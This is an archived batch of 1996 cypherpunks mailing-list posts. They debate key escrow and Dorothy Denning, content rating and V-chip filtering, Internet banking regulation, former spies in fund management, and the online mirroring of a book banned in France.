From:	IN%"alano@teleport.com"  "Alan Olsen" 26-JAN-1996 16:31:41.98

>The purpose of all the ratings, and the filters and all the other stuff is
not to "protect kids".  It is to protect the prejudices of the adults.  They
do not want to see it anywhere in the world, not just inflicting some sort
of imaginary harm on their children.  I expect the first people to use the
"reversed filters" will be the kids themselves.  (Behind the parents back,
of course.)

I have known too many adults that believe that by restricting their kids
access to information, they can prevent them from growing up.  In these
parent's minds, such information is what makes them want to hump their
little brains out.  Biology has nothing to do with it in their limited way
of thinking.  Cluelessness does not just cover computers with these people.
It also covers any other topic that required more than two brain cells to
understand.
-----------------
	Strongly agreed. Why should parents be able to determine what
information their children receive? Are children the property of the parents?
I can see some rights of parents over children, since they have
responsibilities over their children also (and thus need the rights to fulfill
those responsibilities), but censorship is not one of them. No study has ever
shown actually harmful effects from viewing pornography.
	Crypto relevance? A lot of the same people wanting to restrict
children's access to information are also against cryptography, anonymnity,
etcetera- see the "CyberAngels" for an instance.
	Incidentally, they also tend to want to restrict people (or at least minors) from viewing other information
opposing them. "SafeSurf", the censorship-by-rating site that the CyberAngels
are associated with, has as one of its categories of stuff to restrict access
to any advocacy of illegal drug usage. Translation- NORML and anyone else
working for drug legalization. Of course, the anti-some-drugs biases of the
Guardian Angels are well known...
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Jan 1996 06:57:14 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <2.2.32.19960127225107.009173b4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:49 PM 1/26/96 -0800, Rich Graves wrote:
>On Fri, 26 Jan 1996, Thomas Grant Edwards wrote:
>
>> I think the big bait-and-switch is her description of the various 
>> companies falling over themselves to get to _VOLUNTARY_ key escrow to 
>> avoid losing data and protecting themselves against employee problems 
>> versus _MANDATORY_GOVERNMENT_ key escrow to ensure that individuals 
>> cannot hide information from the government.
>> 
>> Key escrow is good.  Key escrow against your will is bad.
>
>Yo.
>
>I especially enjoyed this sentence: "Individuals would be allowed to
>develop their own encryption systems for personal or educational use
>without obtaining licenses, though they could not distribute them to
>others."

Why is it that whenever I read Denning's pronouncements I feel like I am
reading something from a villainess in an Ayn Rand novel?  

Denning has become the epitome of the pure authoritarian government world
view.  Analysis of her viewpoints makes me more of an anarchist every time I
read her rants.  It is that smarmy "We know better than you do" with
absolutely no rational argument as to why it is true.  It is people like
this that are generating such distrust in Government by promoting irrational
statism.  (Government by random fiat keeps a high employment for those who
make their living off of political parody, paranoia of the government, the
court system, lawyers and lawmakers, and anarchists everywhere.)

>It's unclear whether it's OK to share books, algorithms, and source code; 
>or if it is, what's the point?

Depends on your ability to challenge the status quo.  A vague law with lots
of harsh but undefined penalties is much more effective than something that
is rigidly defined.  With rigidly defined laws, you can find loopholes and
ways to push the envelope.  With vague rules, people will tend to err on the
side of caution.

>Outlaw cryptography, and only cryptographers and outlaws will have 
>cryptography.

"Hey, we found this Tim May guy down at the school playground selling crypto
to the kids!  Let's throw the book at him!"
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
               National Security uber alles!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 27 Jan 1996 22:46:20 +0800
To: cypherpunks@toad.com
Subject: OpSec Snooping
Message-ID: <199601271430.PAA13276@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Economist, 27 January 1995

Licence to make a killing

Spies and fund managers seem to be cut from the same
cloth. Both take calculated risks, are fickle when it
comes to allegiances and have an annoying tendency to
speak in code. More important, however, they both thrive
on inside information. This may be why, in the headlong
rush to exploit new emerging-market opportunities, a
growing number of investment funds are turning to former
spooks for some help.

The latest fund to tap the know-how of the intelligence
community is the Scottish American Investment Company,
based in Edinburgh, which invests heavily in
international equities. On January 17th it announced that
Sir Colin McColl, the former head of M16, Britain's
foreign-intelligence service, is joining its board of
directors. The fund hopes that Sir Colin's experience in
gauging political risks -- he has worked in Eastern
Europe and SouthEast Asia -- will improve the quality of
its investment decisions.

Another ex-spy turned fund manager is Harry Fitzgibbons,
a former American agent and now managing director of Top
Technology Limited, a fund-management group based in
London. Last year, he teamed up with Alexey Vlasov, a
former Soviet agent, to launch a new high-technology fund
for investment in Russia. It employs three other former
Soviet agents in its St Petersburg office.

Why are spooks so sought after by international
investors? The reason, says Mr Fitzgibbons, is that
spying is the ideal training ground for a career in
emerging-market investing. Not only are intelligence
agents good at spotting when someone is lying, but they
are also experts at building relationships and waiting
patiently for them to develop: two essential traits for
successful long-term investors. Mr Fitzgibbons argues
that it is these general skills, rather than any specific
local knowledge, that makes former spies such attractive
partners.

Unfortunately, old adversaries do not always get on as
swimmingly as Messrs Fitzgibbons and Vlasov. In 1994, for
example, the Vietnam Frontier Fund invited William Colby,
a former director of America's Central Intelligence
Agency, who headed the agency's Vietnam station during
the Vietnam War, to join its board of directors. His
appointment prompted the fund's chairman, Nguyen Xuan
Oanh, a former deputy prime minister of South Vietnam, to
quit. Not only did the fund lose its chairman, but it was
unable to take advantage of Mr Colby's experience: he
left the board in December 1994 after Hanoi refused him
a visa.

Despite such drawbacks, the demand for former spooks is
rumoured to be growing. One such hint comes from Parvus,
a consultancy (with offices in Moscow and Silver Spring,
Maryland) that employs a number of ex-spies. The firm
claims that it has just been contacted by a headhunter
looking for recruits. The mission, should anyone choose
to accept it, is to head up a new intelligence unit for
a big New York mutual fund. Unfortunately for potential
applicants, the headhunters say that the fund's name is
still top secret.


-------------------


For more on Parvus (not the Utah corp) and its stable of 
ex-spooks see:


URL: http://www2.indigo-net.com/Indigo/INT/INTpublic/1995/
         INT275/INT275-a3.html


and other AltaVista links to globalization of OPSEC.


-------------------

URL: http://www.cais.com/zhi/OPSHomePage.html


                   OPERATIONS SECURITY PROFESSIONALS SOCIETY
                                       
   
   The OPSEC Professionals Society was established in March 
1990 to
   further the practice of Operations Security as a profession 
and to
   foster the highest quality of professionalism and competence 
among its
   members. OPSEC is a process used to deny to potential 
adversaries
   information about capabilities and/or intentions by 
identifying,
   controlling and protecting evidence of the planning and 
executing of
   sensitive activities. This process is equally applicable to
   government, its contractors, and to private enterprise in 
the
   protection of their trade secrets and other proprietary 
information.
   While military strength and capability still are required 
during the
   next years of uncertainty, we must likewise protect our 
critical
   economic information and technologies from those who seek to 
exploit
   them to their benefit and to our disadvantage.


--------------------

URL: http://www.cais.com/zhi/OPSCIND1.html


                    COUNTERINTELLIGENCE NEWS & DEVELOPMENTS
                                       
   
  Issue No. 1
  
   
   Letter from the Director, National Counterintelligence 
Center

   
   I am pleased to present the inaugural issue of the National
   Counterintelligence Center's (NACIC) Counterintelligence 
News and
   Developments (CIND). This periodic publication is designed 
to meet the
   information needs of US private industry by communicating 
important,
   yet unclassified information on the threat posed by foreign 
countries
   against US interests.

   
   The CIND is part of the NACIC's effort to develop a more 
effective
   mechanism to disseminate information on foreign intelligence 
targeting
   activities against both the US Government and private 
industry. This
   initial issue includes some information you may have already 
seen in
   our Annual Report to Congress on Foreign Economic Collection 
and
   Industrial Espionage and the Survey of the 
Counterintelligence Needs
   of Private Industry. From time to time, we will republish or 
extract
   information from such key publications to highlight data we 
perceive
   to be of interest to private industry. Furthermore, we will 
solicit
   additional information from all sources in order to better 
understand
   and support private industry through this unclassified 
forum.

   
   The NACIC will not generally republish information readily 
available
   to the general public. Our goal is to make the CIND's 
contents
   substantive and relevant to customer needs. Therefore, I 
cannot
   overemphasize the importance of receiving feedback from each 
of you.
   Future issues will respond to the requirements of industry 
as a whole
   and will be driven by your needs and interests. The 
responses received
   from you, the customer, will determine the future content, 
format, and
   frequency of the CIND. The final page of the current edition 
provides
   information on how to forward responses to the CIND Editor.

   
   Michael J. Waguespack
   Director, National Counterintelligence Center
   
   
     
_________________________________________________________________

   
   
   
   What Is the NACIC?

   
   The National Counterintelligence Center (NACIC) was 
established in
   1994 by Presidential Decision Directive/NSC-24. The NACIC's 
creation
   was one of the recommendations made by PDD-24 to improve US
   counterintelligence (CI) effectiveness by enhancing 
coordination and
   cooperation among various US CI agencies.

   
   An interagency organization staffed with CI and security 
professionals
   from the FBI, CIA, NSA, DIA, and the Departments of Defense 
and State,
   the NACIC is primarily responsible for coordinating 
national-level CI
   activities, and reports to the National Security Council 
through the
   National Counterintelligence Policy Board (NACIPB).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 28 Jan 1996 05:07:34 +0800
To: cypherpunks@toad.com
Subject: Feds on Internet Banking
Message-ID: <01I0IE04YCQ8A0UP9Y@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Evidence that the Fed has noticed Internet banking. It looks like
they're more concentrating on electronic checks than on digital cash, though;
I may be mistaken in that, however. Any of the lawyers on here know much about
banking law?
	-Allen

   Reuters New Media
   
   _ Friday January 26 2:01 PM EST _
   
Boston Fed Minehan Warns Of "Virtual" Bank Danger

   NEW YORK - Federal Reserve Bank of Boston President Cathy Minehan is
   warning against potential risks of "virtual" banking -- or
   electronic account systems handling electronic money.
   
   Minehan stressed that the regulatory community has just begun to
   consider these issues and that much work needs to be done before it
   even knows all the questions to ask, let alone what answers to give.
   
   "Legislation and regulation of new payments system alternatives
   could be unwise right now, but that does not mean that participants in
   such systems should not oversee them or that central banks should not
   be concerned" Minehan said in an address to the Goldman, Sachs
   Conference on Risk Reduction in Payments, Clearance and Settlement
   Systems.
   
   "'Smart' card technology is now being used to store electronic
   'notes' authorized by the card-holder's bank that can be used to
   transfer value between banks, consumers and merchants," she said.
      
   "These electronic 'notes' flow over the Internet and give
   authorization for funds to be withdrawn from a bank account and paid
   to another party electronically," Minehan said.
   
   "This can come close to being a new form of currency in that the
   potential exists for the value on the card to remain in circulation,
   transferring from card to card, and one endpoint to another, without
   necessarily being converted to a more traditional form of money,"
   she said.
   
[...]

   "'In this regard, it is especially intriguing to consider how the
   'virtual' bank might be regulated," said Minehan. "Some
   maintain that virtual banking is just a new form of bank which all the
   usual rules and regulations apply," she said.
   
   Copyright, Reuters Ltd. All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sun, 28 Jan 1996 08:30:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Denning's misleading statements
In-Reply-To: <ad2ff0ab010210043115@[205.199.118.202]>
Message-ID: <199601280025.QAA24212@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello you all!

I would like to make a suggestion that D. Denning; others
who are pro-escrow/clipper; and some of you folks here on
this forum get together for a debate. 

Ideally, this would be real nice on a TV show such as the
McNiel Lehrer show on PBS. Barring that, I would think 
that an IRC chat channel could be set up so that they
could get on line and engage in an on line discussion.

Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 28 Jan 1996 05:45:01 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601271610.IAA26122@mailx.best.com>
Message-ID: <9601272133.AA10060@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>On the other hand, with inaccurate information concerning enemy
>capabilities and will, one is more likely to believe that the
>enemy is incapable of destroying you from the grave, or lacks the
>necessary will to destroy the world in response to a small
>"surgical" nuclear strike.

Actually the MAD doctrine is critically dependent on mutual knowledge
concerning military capability. I have met UK intelligence types who
have discussed how they have deliberately permitted Soviet espionage
activities in order that they could confirm that the NATO alliance was
a defensive one.

Throughout the majority of the cold war both sides took great pains
to avoid creating a situation which forced the other into nuclear
brinkmanship. Indeed until Regan there were strenuous efforts made to
preserve the balance of power. 

>They called it the peace of fear, the peace of terror, and the pax
>atomica.  They did not call it the peace of the NSA

They probably should do, the NSA was critical in ensuring the demise
of the USSR and in maintaining stability throughout the cold war period.

The point is not that the NSA had no military function. The point is that
it is now an agency searching for a role. It is often a dangerous thing
for the military to involve itself in civil affairs. 

		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 07:40:19 +0800
To: cypherpunks@toad.com
Subject: Re: Banned French Book Online
Message-ID: <ad2fef1400021004d174@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 1/27/96, Declan B. McCullagh wrote:
>As Tim May noted a few messages ago, the French government censored a
>book written by the physician to their late president, Francois

To set the record straight, Tim Dierks mentioned this in response to my
point that the French do some things right. (Emphasis on "some.")

Also, while I'm clarifying things, at least two recent messages have
referred to me as "Dr. May." Normally I don't feel obliged to correct such
things, but I will here. I don't have a Ph.D., just a bachelors degree.
Sosumi.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 07:40:06 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <ad2ff0ab010210043115@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 PM 1/27/96, Alan Olsen wrote:

>Why is it that whenever I read Denning's pronouncements I feel like I am
>reading something from a villainess in an Ayn Rand novel?
>
>Denning has become the epitome of the pure authoritarian government world
>view.  Analysis of her viewpoints makes me more of an anarchist every time I
>read her rants.  It is that smarmy "We know better than you do" with

One of the interesting things about the whole crypto debate, going back at
least to the Clipper announcement (and actually some months before) has
been that the pro-restrictions, pro-GAK side of the argument has almost no
defenders! Except for David Sternlight, Dorothy Denning, and Donn Parker
("attack of the killer Ds"?), there are almost no public spokesmen for the
pro-restriction, pro-GAK side.

She has written numerous pro-GAK position papers for various conferences,
journals (including the "Proc. of the ACM"), and other fora. Where are the
other defenders? Even the producers of GAKked products are fairly careful
to finesse their positions by saying they are only doing what they are
doing because the government is paying them to, or because the export laws
leave them few other options.

I've never met Dorothy Denning, so I hesitate to characterize her as a
villainess. But certainly she's the only noted cryptographer I know of
who's gone so far out on a limb to defend a position the vast majority of
computer scientists, civil libertarians, and cryptographers scoff at. (And
I don't just mean it is we libertarians and civil libertarians who are
scoffing, I mean that nearly every noted expert who has carefully reviewed
the various schemes to control crypto and to provide GAK has found them to
be essentially unenforceable except via draconian police state methods, and
maybe not even then.)

I personally believe her estrangement from the mainstream position these
last several years and her apparent close association with the
inside-the-Beltway crowd has actually skewed her judgment, that she is no
longer evaluating policies and capabilities based on reasonable objective,
academic analysis.

Her views, and even many of her examples, are very close the views and
examples used by FBI Director Louis Freeh in his testimony to Congress a
few years ago. (I scanned and OCRed this testimony as a favor to Whit
Diffie, so in reviewing the text for OCR corrections, I became very
familiar with Freeh's fear-inducing testimony.)

I don't mean this as a cheap shot against her, but I would not be surprised
to see her take on some sort of "Undersecretary for National Information
Infrastrucure Affairs" or somesuch position in the next Administration (no
matter which side wins the election). She's become a player in the
Washington game.


>Depends on your ability to challenge the status quo.  A vague law with lots
>of harsh but undefined penalties is much more effective than something that
>is rigidly defined.  With rigidly defined laws, you can find loopholes and
>ways to push the envelope.  With vague rules, people will tend to err on the
>side of caution.

Psychologists call this "random reinforcement." A plethora of vague laws
about intent, conspiracy, and threshold have made this the norm. When there
are 25,983 distinct laws on the books, what else is to be expected?

>"Hey, we found this Tim May guy down at the school playground selling crypto
>to the kids!  Let's throw the book at him!"

"This could not have been me, Your Holiness! I would never think to _sell_
cryptography to the kids--I would give them free samples first."

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 28 Jan 1996 06:36:32 +0800
To: cypherpunks@toad.com
Subject: Banned French Book Online
Message-ID: <sl2eMFa00YUvI2Bqsa@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


As Tim May noted a few messages ago, the French government censored a
book written by the physician to their late president, Francois
Mitterrand. An enterprising fellow in eastern France scanned it into 189
pages of GIF files and put it online.

Now the French police have arrested him, ostensibly on unrelated charges.

I'm putting the complete version of the banned book, _Le Grand Secret_,
online -- you can find it on the following identical sites:

http://web.mit.edu/afs/athena/contrib/bitbucket2/le-grand-secret/secret/
http://www.cs.cmu.edu/afs/cs/user/declan/www/le-secret/complete/
http://robotweb.ri.cmu.edu/afs/cs/user/declan/www/le-secret/complete/
http://mousa.dcs.gla.ac.uk/~stephane/secret/

Since the combined size of the files is 9 MB, Seth Finkelstein and I
stripped the images from 4 bpp to 1 bpp (greyscale to monochrome), and
reduced the combined size to 2 MB. The stripped GIF files are on:

   http://www.cs.cmu.edu/afs/cs/user/declan/www/le-secret/reduced/
   http://robotweb.ri.cmu.edu/afs/cs/user/declan/www/le-secret/complete/
   http://web.mit.edu/afs/cs.cmu.edu/user/declan/www/le-secret/complete/
   http://joc.mit.edu/le-secret/reduced-gifs.tar [tar file]
   http://joc.mit.edu/le-secret/reduced-gifs.tar.gz [compressed tar file]

Related stories and commentary are available at the following identical sites:

   http://www.contrib.andrew.cmu.edu/~declan/
   http://www.cs.cmu.edu/afs/cs/user/declan/www/le-secret/
   http://www.well.com/~declan/le-secret/
   http://robotweb.ri.cmu.edu/afs/cs/user/declan/www/le-secret/
   http://web.mit.edu/afs/cs.cmu.edu/user/declan/www/le-secret/

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 28 Jan 1996 10:15:39 +0800
To: cypherpunks@toad.com
Subject: Re: This post is rated LTC for `Low Technical Content'
Message-ID: <199601280200.SAA24044@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  7:55 PM 1/27/96 -0500, JMKELSEY@delphi.com wrote:
>The best solution has always seemed to me to be one of these three:
>
>a.   Tags appended to notes/posts, from various reviewers, digitally
>signed and otherwise coded to allow intelligent filtering, or
>
>b.   Electronic distributions of reviewers' evaluations tagged to
>notes in some simple way.  (I.e. give each note or post a unique ID
>which appears in the message.)  Then, a smart newsreader/mail
>program sorts the notes accordingly, or
>
>c.   The reviewer reads the group/list, and rates posts according to
>some useful criteria.  He then resends it out to his users, filtered
>as desired.  (CP-LITE seems like a very early version of this.)

d. The "V-Chip" device makes a network query to the selected rating service
to ask for a rating.  What happen when the rating service is unreachable is
just one of the many parameters that the parent needs to set.  (If designed
right, no parent could use it, but its availability would still stop the
adult censorship croud in congress.)

This approach as the advantage that the communications costs accrue to
those using the feature and not to everyone else.  A disadvantage is that
each content item needs some ID.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 28 Jan 1996 10:57:41 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: This post is rated LTC for `Low Technical Content'
In-Reply-To: <199601280200.SAA24044@netcom6.netcom.com>
Message-ID: <Pine.ULT.3.91.960127182733.27229L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jan 1996, Bill Frantz wrote:

> At  7:55 PM 1/27/96 -0500, JMKELSEY@delphi.com wrote:
> >The best solution has always seemed to me to be one of these three:
> >
> >a.   Tags appended to notes/posts, from various reviewers, digitally
> >signed and otherwise coded to allow intelligent filtering, or
> >
> >b.   Electronic distributions of reviewers' evaluations tagged to
> >notes in some simple way.  (I.e. give each note or post a unique ID
> >which appears in the message.)  Then, a smart newsreader/mail
> >program sorts the notes accordingly, or
> >
> >c.   The reviewer reads the group/list, and rates posts according to
> >some useful criteria.  He then resends it out to his users, filtered
> >as desired.  (CP-LITE seems like a very early version of this.)
> 
> d. The "V-Chip" device makes a network query to the selected rating service
> to ask for a rating.  What happen when the rating service is unreachable is
> just one of the many parameters that the parent needs to set.  (If designed
> right, no parent could use it, but its availability would still stop the
> adult censorship croud in congress.)

This just gets ridiculous. It adds a lot of overhead without necessarily 
giving you good information.

On the Net, there is no longer any real difference between underground 
and mainstream data. It's all just as easy to get. You can't block it.

You're thinking like engineers. This isn't an engineering problem; it's a 
social and artistic problem.

Actually, it's two problems: how to censor people, and how to find stuff 
you're interested in.

Censorship only works if it's dictated and enforced. Ratings don't cut it.

Arbitrary scales can't judge stuff you're interested in. Art cannot be 
reduced to numberical criteria. 

A while ago, and maybe it's still going on, the MIT media lab had an 
interesting music rating service. The way it worked was, you submitted 
stuff you liked, lots of other people submitted stuff they liked, and the 
computer generated a list of stuff that you might like based on apparent 
matches among different people's tastes.

The model to emulate is a computer dating service, not a library.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Jan 1996 11:05:39 +0800
To: cypherpunks@toad.com
Subject: Re: RANT: When hi-tech is a hinderance (freedom w/in limits)
Message-ID: <m0tgN12-00090fC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:48 AM 1/28/96 +0100, Anonymous wrote:


>Cypherpunks or crypto relevance?  Sometimes high-tech can be
>a weakness.


You don't know how right you are.

Jim Bell

Klaatu Burada Nikto

"Something is going to happen.    Something.....Wonderful!"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQrhZvqHVDBboB2dAQFKZAP/U6tKRFYbMmag6wB/HEO/K8XxsSUFr5dt
9sMaeptBa2EEvn2f4rrlZ9AadKTEX8qhd9VI3gF+XfsZ8tVnfK7FSvdeteoN7iBB
tVPfXgozxLWqKFUe1YoYIKJof9c5q4IPNkOaWCUAiMbOiA8BrhYLPUOISkC0W5f8
0yse7fmFA1w=
=0Fe9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 28 Jan 1996 11:17:38 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: This post is rated LTC for `Low Technical Content'
Message-ID: <199601280256.SAA29212@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:36 PM 1/27/96 -0800, Rich Graves wrote:
>On Sat, 27 Jan 1996, Bill Frantz wrote:
>
>> At  7:55 PM 1/27/96 -0500, JMKELSEY@delphi.com wrote:
>> >The best solution has always seemed to me to be one of these three:
>> >
>> >a.   Tags appended to notes/posts, from various reviewers, digitally
>> >signed and otherwise coded to allow intelligent filtering, or
>> >
>> >b.   Electronic distributions of reviewers' evaluations tagged to
>> >notes in some simple way.  (I.e. give each note or post a unique ID
>> >which appears in the message.)  Then, a smart newsreader/mail
>> >program sorts the notes accordingly, or
>> >
>> >c.   The reviewer reads the group/list, and rates posts according to
>> >some useful criteria.  He then resends it out to his users, filtered
>> >as desired.  (CP-LITE seems like a very early version of this.)
>> 
>> d. The "V-Chip" device makes a network query to the selected rating service
>> to ask for a rating.  What happen when the rating service is unreachable is
>> just one of the many parameters that the parent needs to set.  (If designed
>> right, no parent could use it, but its availability would still stop the
>> adult censorship croud in congress.)
>
>This just gets ridiculous. It adds a lot of overhead without necessarily 
>giving you good information.

... <lots of good rant deleted>

Rich - Remember that this is NOT being designed for usability, only to stop
a bad movement in congress.  The reason I proposed solution (d) is that it
adds no overhead to people who don't use it.  (I propose using the
Message-ID: header as a lookup ID for items received by email.  I suspect
it has spoofing problems, but perhaps congress won't notice.)

Perhaps we should re-visit the need for usability if anyone really wants to
use such a system themselves.  As a parent, I always wanted my children to
explore freely and discuss anything they found that bothered them.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 28 Jan 1996 11:17:44 +0800
To: cypherpunks@toad.com
Subject: Re: This post is rated LTC for `Low Technical Content'
Message-ID: <v02120d00ad3095d60ac4@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:03 1/27/96, Bill Frantz wrote:

>d. The "V-Chip" device makes a network query to the selected rating service
>to ask for a rating.  What happen when the rating service is unreachable is
>just one of the many parameters that the parent needs to set.  (If designed
>right, no parent could use it, but its availability would still stop the
>adult censorship croud in congress.)

Of course the V-Chip transmits the ID number of the program to be rated
upstream. Since all programs will be rated by the chip, regardless if you
choose to use the rating or not, the exact channel you are watching will be
tracked and logged.

Have fun,

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Central <tedwards@access.digex.net>
Date: Sun, 28 Jan 1996 08:11:48 +0800
To: cypherpunks@toad.com
Subject: #pgpfone on IRC
Message-ID: <Pine.SUN.3.91.960127190034.8891A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



I suggest the use of #pgpfone on IRC for setting up impromtu tests of
PGPfone over the internet. 

I hope it works better than NetPhone!

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 28 Jan 1996 09:25:04 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
In-Reply-To: <ad2ff0ab010210043115@[205.199.118.202]>
Message-ID: <199601280108.TAA05461@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


(Tim May said:)

> One of the interesting things about the whole crypto debate, going back at
> least to the Clipper announcement (and actually some months before) has
> been that the pro-restrictions, pro-GAK side of the argument has almost no
> defenders! Except for David Sternlight, Dorothy Denning, and Donn Parker
> ("attack of the killer Ds"?), there are almost no public spokesmen for the
> pro-restriction, pro-GAK side.

This is interesting.

My theory is that they know they can't win a fair and open debate, so they
force us to fight straw men and try to bamboozle politicians with
ritualistic secret briefings.  The secrecy adds credibility to weak
arguments and heads off those of us who would try to point up the flaws in
them.  You can't critique what you haven't seen.

I think that one of the planks of the pro-crypto platform ought to be a 
call for the NSA to explain and defend their position publicly, and to 
engage in a dialogue on a moderated mail list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoppo <hoppo@geko.net.au>
Date: Sat, 27 Jan 1996 17:36:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601270909.UAA24039@zonk.geko.net.au>
MIME-Version: 1.0
Content-Type: text/plain


hi if you have anything interesting please send




                                       thanks,hoppo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jan 1996 08:25:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The French do some things right...
In-Reply-To: <ad2edc7e2002100496f8@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960127191007.11084A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill _did_ get elected, notwithstanding the mistresses, the inhalations, 
the connected-lawyer-wife.

WE may _talk_ more about our scnadals, but does it influence outcomes?

Gary Hart didn't get kicked off the train for boffing a bimbo. He got the 
boot for being an asshole about it. Is it so much to ask "the best and 
brightest" - to run their indiscretions discretely?

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jan 1996 08:46:39 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: OpSec Snooping
In-Reply-To: <199601271430.PAA13276@utopia.hacktic.nl>
Message-ID: <Pine.SV4.3.91.960127192856.11084D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I would like to see some factual evidence that active-duty or retired spooks 
are better than my late grandmother at spotting a liar. 

What spooks do have is, no lamer press and no
this-quarter's-numbers-define-my-universe stock analysts limelighting
their work. They can afford to work slowly, carefully, methodically. Being
a spook doesn't prove you do do that; it means you can, if you are
inclined to do so (and your bosswants you to do that). 

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 10:30:38 +0800
To: cypherpunks@toad.com
Subject: Re: RANT: When hi-tech is a hinderance (freedom w/in limits)
Message-ID: <ad301725050210043b32@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 AM 1/28/96, Anonymous wrote:
>A short 'rant' on techno-dinosaurism...
...
>Cypherpunks or crypto relevance?  Sometimes high-tech can be
>a weakness.

The canonical story being Arthur C. Clarke's "Superiority," said at one
time to have been required reading at MIT.


>I've heard that the Soviets, not having the luxury of sexy
>Crays and whatnot, were adept and using hundreds of PCs to
>do their cryptanalysis... and so may have a lot of interesting
>parallel processing algorithms.

I'm skeptical. Sun Microsystems did indeed buy up a bunch of Russian
programmers, a couple of years ago. Haven't heard anything come out of
this.

